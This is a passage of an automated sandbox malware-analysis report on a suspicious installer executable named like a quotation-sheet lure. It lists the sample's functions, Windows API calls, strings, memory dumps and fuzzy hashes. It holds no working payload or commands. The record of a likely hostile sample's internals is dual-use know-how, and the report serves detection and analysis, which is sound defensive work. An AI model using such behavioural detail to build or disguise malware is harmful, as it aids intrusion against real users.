                                                                                  • Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,80000000,00000003), ref: 00405ADA
                                                                                  • Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                • String ID: %s=%s$NUL$[Rename]
                                                                                • API String ID: 222337774-4148678300
                                                                                • Opcode ID: 89de4d3d5a818e9388275d82155379b0538a157bfcc351b2c6990c4d01eb2e15
                                                                                • Instruction ID: f02436ff356463cbad731f06bd7f36315381bbfe77d8bed81a3cf794d1fe08c5
                                                                                • Opcode Fuzzy Hash: 89de4d3d5a818e9388275d82155379b0538a157bfcc351b2c6990c4d01eb2e15
                                                                                • Instruction Fuzzy Hash: 2231C274604B597BD2207B615D49F6B3A9CEF45758F24013BF905B22D2DA78AC008EBD
                                                                                Function 004060CE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",75DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406126
                                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00406133
                                                                                • CharNextA.USER32(?,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",75DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406138
                                                                                • CharPrevA.USER32(?,?,75DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406148
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004060CF
                                                                                • *?|<>/":, xrefs: 00406116
                                                                                • "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe", xrefs: 0040610A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Char$Next$Prev
                                                                                • String ID: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 589700163-3538342386
                                                                                • Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                                                • Instruction ID: f4547238e9b15f098583f6e7a29ad5d1a016b5704a22f35d65a3ab7f018ae362
                                                                                • Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                                                • Instruction Fuzzy Hash: EF1104A18043A22DFB3246284C44B77AF884F5A764F19407BE4C6763C3CA7C9C52866D
                                                                                Function 004040AF Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000EB), ref: 004040CC
                                                                                • GetSysColor.USER32(00000000), ref: 004040E8
                                                                                • SetTextColor.GDI32(?,00000000), ref: 004040F4
                                                                                • SetBkMode.GDI32(?,?), ref: 00404100
                                                                                • GetSysColor.USER32(?), ref: 00404113
                                                                                • SetBkColor.GDI32(?,?), ref: 00404123
                                                                                • DeleteObject.GDI32(?), ref: 0040413D
                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404147
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                • String ID:
                                                                                • API String ID: 2320649405-0
                                                                                • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                • Instruction ID: b9626d203e07c142b7df78836af29c525e1d4ad6db78ea87979aa0b8fd7aa94c
                                                                                • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                • Instruction Fuzzy Hash: 9C219671904704ABC7219F78DD48B4BBBF8AF41714F048529E996F63E0D734E944CB55
                                                                                Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                                  • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                                • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                                • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3730416702-0
                                                                                • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                                • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                                Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                                • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Global$Free$Alloc
                                                                                • String ID:
                                                                                • API String ID: 1780285237-0
                                                                                • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                                • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                                Function 00402C17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32(00000000,00000000), ref: 00402C2F
                                                                                • GetTickCount.KERNEL32 ref: 00402C4D
                                                                                • wsprintfA.USER32 ref: 00402C7B
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                  • Part of subcall function 0040507C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00402C8E,00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000), ref: 004050D8
                                                                                  • Part of subcall function 0040507C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll), ref: 004050EA
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C9F
                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402CAD
                                                                                  • Part of subcall function 00402BFB: MulDiv.KERNEL32(00076A73,00000064,00076AA2), ref: 00402C10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                • String ID: ... %d%%
                                                                                • API String ID: 722711167-2449383134
                                                                                • Opcode ID: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
                                                                                • Instruction ID: 50736a5f322e453d47399e53c3729a9749aec8e4ed59b6a4d84230157c1bc9e9
                                                                                • Opcode Fuzzy Hash: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
                                                                                • Instruction Fuzzy Hash: 400161B090A624EBEB21AF64EF0DD9F7768EB04701B444177F405B11E4D6B89942C69E
                                                                                Function 00404947 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404962
                                                                                • GetMessagePos.USER32 ref: 0040496A
                                                                                • ScreenToClient.USER32(?,?), ref: 00404984
                                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404996
                                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049BC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Send$ClientScreen
                                                                                • String ID: f
                                                                                • API String ID: 41195575-1993550816
                                                                                • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                • Instruction ID: 9a5aaf7a7a2eb46524cfe6ed05727662581176125bc7a9594c14671d6fd5834d
                                                                                • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                • Instruction Fuzzy Hash: D60152B1D00219BADB11DBA4DC45FFFBBBCAF55711F10416BBA10B61C0C7B869018BA5
                                                                                Function 00402B7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                                • wsprintfA.USER32 ref: 00402BCE
                                                                                • SetWindowTextA.USER32(?,?), ref: 00402BDE
                                                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                • API String ID: 1451636040-1158693248
                                                                                • Opcode ID: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                                                                • Instruction ID: 59ddb31903a36680b4224ad2704aa62d89b79b457576c75755388437ec856a92
                                                                                • Opcode Fuzzy Hash: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                                                                • Instruction Fuzzy Hash: D5F01D70900208AAEF205F60DD0ABAE3779FB04345F00803AFA16B51D0D7B9AA559B59
                                                                                Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                • String ID:
                                                                                • API String ID: 2667972263-0
                                                                                • Opcode ID: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
                                                                                • Instruction ID: 485419aab899adaa45f09767fc84dfb68f9751acdadaf5e244b928a283e6c860
                                                                                • Opcode Fuzzy Hash: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
                                                                                • Instruction Fuzzy Hash: 0A21AE71800128BBCF116FA5CE89DAE7A79EF08364F10423AF921762D0C7795D018F98
                                                                                Function 0040483D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(ldreboligblokkene: Installing,ldreboligblokkene: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
                                                                                • wsprintfA.USER32 ref: 004048E3
                                                                                • SetDlgItemTextA.USER32(?,ldreboligblokkene: Installing), ref: 004048F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                • String ID: %u.%u%s%s$ldreboligblokkene: Installing
                                                                                • API String ID: 3540041739-1183586245
                                                                                • Opcode ID: bf1bdcac2109adbb76e2cfdf4929b7a7dc251d6602f1380599200b875f001fd7
                                                                                • Instruction ID: c0766d521516c7b6303674c7dd8cea214f166acaf9b397f83c092fcb524d35e8
                                                                                • Opcode Fuzzy Hash: bf1bdcac2109adbb76e2cfdf4929b7a7dc251d6602f1380599200b875f001fd7
                                                                                • Instruction Fuzzy Hash: 6A110A736041283BDB0076ADDC45EAF3288DB85374F254637FA65F21D1EA78CC1285E8
                                                                                Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Close$DeleteEnumOpen
                                                                                • String ID:
                                                                                • API String ID: 1912718029-0
                                                                                • Opcode ID: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
                                                                                • Instruction ID: 2c69578fec59b839bbbb6554d628e5ed2d7180fb0bd31e8d2d7d3181fb534eb1
                                                                                • Opcode Fuzzy Hash: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
                                                                                • Instruction Fuzzy Hash: 93113D71A00108BEDF229F90DE89DAA3B7DEB54349B504436F901F10A0D775AE51EB69
                                                                                Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                • String ID:
                                                                                • API String ID: 1849352358-0
                                                                                • Opcode ID: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
                                                                                • Instruction ID: 869b35d44be7719ac4f8667573c2d83536e062a508785c5670752e956bf1946f
                                                                                • Opcode Fuzzy Hash: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
                                                                                • Instruction Fuzzy Hash: 1BF0ECB2A04114AFEB01ABE4DD88DAFB7BDEB54305B104476F602F6191C7749D018B79
                                                                                Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDC.USER32(?), ref: 00401D3B
